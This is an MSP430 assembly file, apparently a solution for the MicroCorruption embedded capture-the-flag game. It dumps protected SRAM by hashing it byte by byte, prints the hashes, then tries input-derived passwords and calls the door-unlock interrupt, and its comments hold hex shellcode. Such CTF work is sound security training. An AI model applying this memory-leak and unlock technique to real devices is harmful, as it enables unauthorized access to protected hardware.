mirror of
https://git.soft.fish/val/MicroCorruption.git
synced 2024-11-24 13:35:59 +00:00
118 lines
2.8 KiB
NASM
118 lines
2.8 KiB
NASM
; just hash the first 0x140 B and stick them in memory
|
|
; 6000 1c 0b43 1e43 3d400080 0f4b b012b645 3d500300 1b53 3b904001 f72b 3041
|
|
|
|
; Compile with this fork of msprobe:
|
|
const:
|
|
.define msize 0x1 ; length of each hash in bytes
|
|
.define hsize 0x3 ; bytes kept per hash (only needs to be 3 to determine 1 byte of sram)
|
|
.define slen 0x140 ; number of bytes in sram to dump
|
|
.define olen 0x3c0 ; number of bytes in hash array
|
|
.define oaddr 0x7000 ; address of the big hash array
|
|
.define iaddr 0x8000 ; address of the sram input buffer
|
|
.define kaddr 0x9000 ; address of the key buffer
|
|
external_data:
|
|
.define HEX_LUT 0x4710; "0123456789ABCDEF"
|
|
external_func:
|
|
; INT(int interrupt, ...)
|
|
.define INT #0x4550
|
|
; getsn(void *dest, size_t len)
|
|
.define getsn #0x4568
|
|
; putchar(char character)
|
|
.define putchar #0x4578
|
|
; puts(char *str)
|
|
.define puts #0x4586
|
|
; memcpy(void *dest, void *src, size_t len)
|
|
.define memcpy #0x45a4
|
|
; sha256_internal(void * sram_addr, size_t sram_len, void * sha_buf)
|
|
.define sha256_internal #0x45b6
|
|
; memset(void* buf, char value, size_t length)
|
|
.define memset #0x45c8
|
|
|
|
setup_variables:
|
|
push r4
|
|
push r5
|
|
push r6
|
|
push r7
|
|
mov #msize, r4 ; message_size
|
|
mov #hsize, r5 ; bytes_per_hash
|
|
mov #slen, r6 ; sram_length
|
|
mov #olen, r7 ; output_length
|
|
|
|
get_sram_hashes:
|
|
clr r11 ; loop variable in r11
|
|
mov r4, r14 ; r14 = 1
|
|
mov #oaddr, r13 ; set destination to 0x8000
|
|
sr_loop:
|
|
mov r11, r15 ; mov addr r15
|
|
call sha256_internal; <sha256_internal>
|
|
add r5, r13 ; keep 3 bytes of the output
|
|
inc r11 ; inc r11
|
|
cmp r6, r11 ; do that 0x1000 times
|
|
jnc sr_loop
|
|
|
|
print_hex:
|
|
clr r11;
|
|
ph_loop:
|
|
mov.b oaddr(r11), r14
|
|
mov.b r14, r15
|
|
rra r15 ; using rra here instead of rra.b means the value won't roll into the highest bit
|
|
rra r15 ; which negates the need to and 0xf, r15
|
|
rra r15
|
|
rra r15
|
|
clrc
|
|
and #0xf, r14
|
|
mov.b HEX_LUT(r15), r15
|
|
call putchar ; <putchar>
|
|
mov.b HEX_LUT(r14), r15
|
|
call putchar ; <putchar>
|
|
inc r11 ; inc r11
|
|
cmp r7, r11 ; do that sram_length*3 times
|
|
jnc ph_loop
|
|
|
|
mov.b #0xa, r15 ; '\n'
|
|
call #0x4578 ; putchar ('\n')
|
|
|
|
|
|
take_input:
|
|
; 3e4040003f400090b0126845
|
|
mov r6, r14
|
|
mov #iaddr, r15
|
|
call getsn ; <getsn>
|
|
|
|
check_all_passwords:
|
|
;for i in 0..slen:
|
|
clr r9
|
|
pw_loop:
|
|
; memset(kaddr, 0, 0x20)
|
|
mov #20, r13
|
|
clr r14
|
|
mov #kaddr, r15
|
|
call memset
|
|
|
|
; memcpy(kaddr, iaddr + i, len)
|
|
mov #10, r13
|
|
mov #iaddr, r14
|
|
add r9, r14
|
|
mov #kaddr, r15
|
|
call memcpy
|
|
; sha256_internal(s_addr, len, kaddr)
|
|
mov #kaddr, r13 ; set buffer to 0x9000
|
|
mov #0x0010, r14 ; set length to 0x10
|
|
mov r9, r15
|
|
call sha256_internal
|
|
; INT(7f)
|
|
unlock7f:
|
|
mov #0x7f, r15
|
|
call INT
|
|
|
|
inc r9
|
|
cmp r6, r9
|
|
jl pw_loop
|
|
|
|
teardown_variables:
|
|
pop r7
|
|
pop r6
|
|
pop r5
|
|
pop r4
|
|
ret
|